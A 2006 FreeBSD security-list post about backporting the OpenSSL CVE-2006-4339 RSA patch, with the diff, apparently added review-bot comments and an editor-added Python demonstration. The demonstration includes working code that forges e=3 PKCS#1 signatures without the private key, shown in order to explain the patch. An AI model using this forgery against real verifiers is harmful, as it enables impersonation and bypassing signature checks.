Date:      Tue, 05 Sep 2006 11:56:30 -0400
From:      Mike Tancsa <mike@sentex.net>
To:        freebsd-security@FreeBSD.org
Subject:   Re: http://www.openssl.org/news/secadv_20060905.txt
Message-ID:  <7.0.1.0.0.20060905112743.149f17c8@sentex.net>
In-Reply-To: <7.0.1.0.0.20060905105253.149db9a8@sentex.net>
References:  <7.0.1.0.0.20060905105253.149db9a8@sentex.net>


[-- Attachment #1 --]
At 10:53 AM 9/5/2006, Mike Tancsa wrote:
>Does anyone know the practicality of this attack ? i.e. is this 
>trivial to do ?

Also, for RELENG_6, can someone confirm that the patch referenced in

http://www.openssl.org/news/patch-CVE-2006-4339.txt

can be applied with the one change of

+{ERR_REASON(RSA_R_PKCS1_PADDING_TOO_SHORT),"pkcs1 padding too short"},

to

+{RSA_R_PKCS1_PADDING_TOO_SHORT,"pkcs1 padding too short"},

I manually added in the diffs and everything seems to compile and 
function with some limited testing. I did

cd /usr/src/crypto/openssl/crypto/rsa
patch < p
cd /usr/src/secure
make clean
make obj
make depend
make includes
make
make install

>         ---Mike
>
>--------------------------------------------------------------------
>Mike Tancsa,                                      tel +1 519 651 3400
>Sentex Communications,                            mike@sentex.net
>Providing Internet since 1994                    www.sentex.net
>Cambridge, Ontario Canada                         www.sentex.net/mike
>
>_______________________________________________
>freebsd-security@freebsd.org mailing list
>http://lists.freebsd.org/mailman/listinfo/freebsd-security
>To unsubscribe, send any mail to "freebsd-security-unsubscribe@freebsd.org"

[-- Attachment #2 --]
*** rsa.h.old	Fri Feb 25 00:49:43 2005
--- rsa.h	Tue Sep  5 11:35:10 2006
***************
*** 352,357 ****
--- 352,358 ----
  #define RSA_R_N_DOES_NOT_EQUAL_P_Q			 127
  #define RSA_R_OAEP_DECODING_ERROR			 121
  #define RSA_R_PADDING_CHECK_FAILED			 114
+ #define RSA_R_PKCS1_PADDING_TOO_SHORT			 105
  #define RSA_R_P_NOT_PRIME				 128
  #define RSA_R_Q_NOT_PRIME				 129
  #define RSA_R_RSA_OPERATIONS_NOT_SUPPORTED		 130
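Review bot: a duplicated reason code clashes silently, so before building check that no other RSA_R_* in rsa.h already uses 105; only the neighbours (114, 121, 127 to 130) are visible in this hunk. If 105 is the value the upstream patch assigns, keeping it makes error output from this RELENG_6 build comparable with a stock build.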
*** rsa_eay.c.old	Tue Sep  5 11:34:50 2006
--- rsa_eay.c	Tue Sep  5 11:36:00 2006
***************
*** 569,574 ****
--- 569,584 ----
  		{
  	case RSA_PKCS1_PADDING:
  		r=RSA_padding_check_PKCS1_type_1(to,num,buf,i,num);
+ 		/* Generally signatures should be at least 2/3 padding, though
+ 		   this isn't possible for really short keys and some standard
+ 		   signature schemes, so don't check if the unpadded data is
+ 		   small. */
+ 		if(r > 42 && 3*8*r >= BN_num_bits(rsa->n))
+ 			{
+ 			RSAerr(RSA_F_RSA_EAY_PUBLIC_DECRYPT, RSA_R_PKCS1_PADDING_TOO_SHORT);
+ 			goto err;
+ 			}
+ 
  		break;
  	case RSA_NO_PADDING:
  		r=RSA_padding_check_none(to,num,buf,i,num);
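Review bot: the `3*8*r >= BN_num_bits(rsa->n)` threshold rejects valid signatures, not only forgeries. r is the unpadded length in bytes, so with a 1024-bit modulus the test fires for every r >= 43 (3*8*43 = 1032), and a SHA-256 DigestInfo is 51 bytes (SHA-384: 67, SHA-512: 83); verifying a SHA-256 signature made with a 1024-bit key will therefore fail here with RSA_R_PKCS1_PADDING_TOO_SHORT. The `r > 42` guard exempts SHA-1's 35-byte DigestInfo but nothing in the SHA-2 family, which is narrower than the "some standard signature schemes" wording in the comment suggests. Since this sits in the generic RSA_PKCS1_PADDING branch of the public-decrypt routine, every RSA_public_decrypt() caller using that padding is affected, not just RSA_verify(). Before installing, test verification of a SHA-256/1024-bit chain; if it breaks, the rsa_sign.c hunk (trailing data and parameters checks) is the part that closes the forgery at the ASN.1 level and can be kept while this heuristic is dropped or relaxed.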
*** rsa_err.c.old	Tue Sep  5 11:36:09 2006
--- rsa_err.c	Tue Sep  5 11:36:39 2006
***************
*** 120,125 ****
--- 120,126 ----
  {RSA_R_N_DOES_NOT_EQUAL_P_Q              ,"n does not equal p q"},
  {RSA_R_OAEP_DECODING_ERROR               ,"oaep decoding error"},
  {RSA_R_PADDING_CHECK_FAILED              ,"padding check failed"},
+ {RSA_R_PKCS1_PADDING_TOO_SHORT           ,"pkcs1 padding too short"},
  {RSA_R_P_NOT_PRIME                       ,"p not prime"},
  {RSA_R_Q_NOT_PRIME                       ,"q not prime"},
  {RSA_R_RSA_OPERATIONS_NOT_SUPPORTED      ,"rsa operations not supported"},
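Review bot: the bare-code form of the new entry is the right adaptation here, since every neighbouring entry in this table is `{RSA_R_..., "..."}` without an ERR_REASON() wrapper; that is the one change the mail describes. Keep the matching define in rsa.h (first hunk) as the source of truth: this table is normally regenerated from the header by util/mkerr.pl, and an entry with no corresponding RSA_R_* define would not survive a regeneration.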
*** rsa_sign.c.old	Wed Oct  1 08:32:39 2003
--- rsa_sign.c	Tue Sep  5 11:37:29 2006
***************
*** 185,190 ****
--- 185,208 ----
  		sig=d2i_X509_SIG(NULL,&p,(long)i);
  
  		if (sig == NULL) goto err;
+ 
+ 		/* Excess data can be used to create forgeries */
+ 		if(p != s+i)
+ 			{
+ 			RSAerr(RSA_F_RSA_VERIFY,RSA_R_BAD_SIGNATURE);
+ 			goto err;
+ 			}
+ 
+ 		/* Parameters to the signature algorithm can also be used to
+ 		   create forgeries */
+ 		if(sig->algor->parameter
+ 		   && ASN1_TYPE_get(sig->algor->parameter) != V_ASN1_NULL)
+ 			{
+ 			RSAerr(RSA_F_RSA_VERIFY,RSA_R_BAD_SIGNATURE);
+ 			goto err;
+ 			}
+ 
+ 
  		sigtype=OBJ_obj2nid(sig->algor->algorithm);
  
  
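Review bot: both new `goto err` branches run after d2i_X509_SIG() has already allocated `sig` (the line just above the hunk), so confirm that the err: label frees it with X509_SIG_free(); otherwise every rejected signature leaks the parsed DigestInfo. The checks themselves are the substantive fix: `if(p != s+i)` refuses any bytes after the DigestInfo, and the parameter test refuses anything but an absent or NULL parameters field, the two places the hunk's own comments identify as usable for forgeries. The `sig->algor->parameter &&` guard deliberately keeps an absent parameters field legal, which PKCS#1 permits, so do not "tighten" it to require NULL. Reusing RSA_R_BAD_SIGNATURE for both cases is acceptable but means a caller cannot distinguish an over-long DigestInfo from a corrupt signature; a dedicated reason code would help when logging attempts. The double blank line before `sigtype=` can go.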

Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?7.0.1.0.0.20060905112743.149f17c8>
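As an added illustration of the forgery that the rsa_sign.c trailing-data check above guards against (this is editor-added example code, not part of Mike's mail, the OpenSSL patch or FreeBSD): a toy PKCS#1 v1.5 verifier with e=3 in a lax and a strict variant, plus the Bleichenbacher cube-root construction that needs no private key. Everything is constructed inline and is an assumption of the example rather than anything on the page: the RSA key (Miller-Rabin with a fixed seed), SHA-256 as the digest, the sample message, and all function names (generate_e3_key, sign, verify, forge_e3, icbrt). Only the trailing-data variant (the patch's `p != s+i` test) is shown; the non-NULL parameters field is the other hiding place and is not modelled.

```python
# Added example (not from the page, OpenSSL or FreeBSD): toy PKCS#1 v1.5
# verification with e=3, lax vs strict, and the Bleichenbacher cube-root
# forgery that only the strict end-of-block check rejects. Python 3.8+.
import hashlib
import random

E = 3
# DER DigestInfo prefix for SHA-256 (RFC 8017, section 9.2, note 1).
SHA256_PREFIX = bytes.fromhex("3031300d060960864801650304020105000420")
SMALL_PRIMES = [p for p in range(3, 2000, 2)
                if all(p % q for q in range(3, int(p ** 0.5) + 1, 2))]

def is_probable_prime(n, rng, rounds=24):
    """Trial division by SMALL_PRIMES, then Miller-Rabin with 'rounds' bases."""
    for p in SMALL_PRIMES:
        if n % p == 0:
            return n == p
    d, r = n - 1, 0
    while d % 2 == 0:
        d, r = d // 2, r + 1
    for _ in range(rounds):
        x = pow(rng.randrange(2, n - 1), d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = x * x % n
            if x == n - 1:
                break
        else:
            return False
    return True

def generate_e3_key(bits=2048, seed=20060905):
    """Toy RSA key (n, d) with e=3: p, q are 2 mod 3 so 3 is invertible mod phi.
    The fixed seed makes the key reproducible; it is a demo key, nothing more."""
    rng = random.Random(seed)

    def prime(b):
        while True:
            c = rng.getrandbits(b) | (1 << (b - 1)) | 1
            if c % 3 == 2 and is_probable_prime(c, rng):
                return c

    p, q = prime(bits // 2), prime(bits // 2)
    return p * q, pow(E, -1, (p - 1) * (q - 1))

def digest_info(msg):
    """DER DigestInfo for SHA-256(msg), the T of EMSA-PKCS1-v1_5."""
    return SHA256_PREFIX + hashlib.sha256(msg).digest()

def sign(msg, n, d):
    """EM = 00 01 FF..FF 00 || T, then EM^d mod n."""
    k = (n.bit_length() + 7) // 8
    t = digest_info(msg)
    em = b"\x00\x01" + b"\xff" * (k - len(t) - 3) + b"\x00" + t
    return pow(int.from_bytes(em, "big"), d, n).to_bytes(k, "big")

def verify(sig, msg, n, strict=True):
    """Parse s^3 mod n as 00 01 FF*(>=8) 00 || T. strict=False is the vulnerable
    behaviour (bytes after T are ignored); strict=True is what the patch's
    'if(p != s+i)' test enforces: T must end exactly at the end of the block."""
    k = (n.bit_length() + 7) // 8
    em = pow(int.from_bytes(sig, "big"), E, n).to_bytes(k, "big")
    if em[:2] != b"\x00\x01":
        return False
    i = 2
    while i < k and em[i] == 0xFF:
        i += 1
    if i - 2 < 8 or i >= k or em[i] != 0x00:
        return False
    t = digest_info(msg)
    if em[i + 1:i + 1 + len(t)] != t:
        return False
    return i + 1 + len(t) == k if strict else True

def icbrt(x):
    """Largest s with s**3 <= x (binary search)."""
    lo, hi = 0, 1 << (x.bit_length() // 3 + 2)
    while lo < hi:
        mid = (lo + hi + 1) // 2
        lo, hi = (mid, hi) if mid ** 3 <= x else (lo, mid - 1)
    return lo

def forge_e3(msg, n):
    """Bleichenbacher 2006, no private key: cube-root 00 01 FF*8 00 || T || 00..00
    and round up. The rounding error is about 3*s**2, i.e. ~2/3 of the block, so
    it only fits in the trailing garbage when that garbage exceeds 2/3 of the
    block (2048-bit n with SHA-256 works, 1024-bit does not). None if it fails."""
    k = (n.bit_length() + 7) // 8
    prefix = b"\x00\x01" + b"\xff" * 8 + b"\x00" + digest_info(msg)
    s = icbrt(int.from_bytes(prefix.ljust(k, b"\x00"), "big")) + 1
    cube = s ** 3
    if cube >= n or not cube.to_bytes(k, "big").startswith(prefix):
        return None
    return s.to_bytes(k, "big")

if __name__ == "__main__":
    n, d = generate_e3_key()
    msg = b"constructed sample message"  # made-up input for this example
    for label, sig in (("genuine", sign(msg, n, d)), ("forged", forge_e3(msg, n))):
        print(label, "lax:", verify(sig, msg, n, False), "strict:", verify(sig, msg, n))
```

Run it with python3: the genuine signature passes both verifiers, the forged one passes only the lax verifier, and the same forgery against a 1024-bit modulus does not even assemble. That last point is the bound behind the rsa_eay.c "2/3 padding" heuristic in the patch: the cube-root rounding error is about two thirds of the block, so the attack needs that much slack after the DigestInfo, which a 2048-bit key with a 51-byte SHA-256 DigestInfo provides and a 1024-bit key does not.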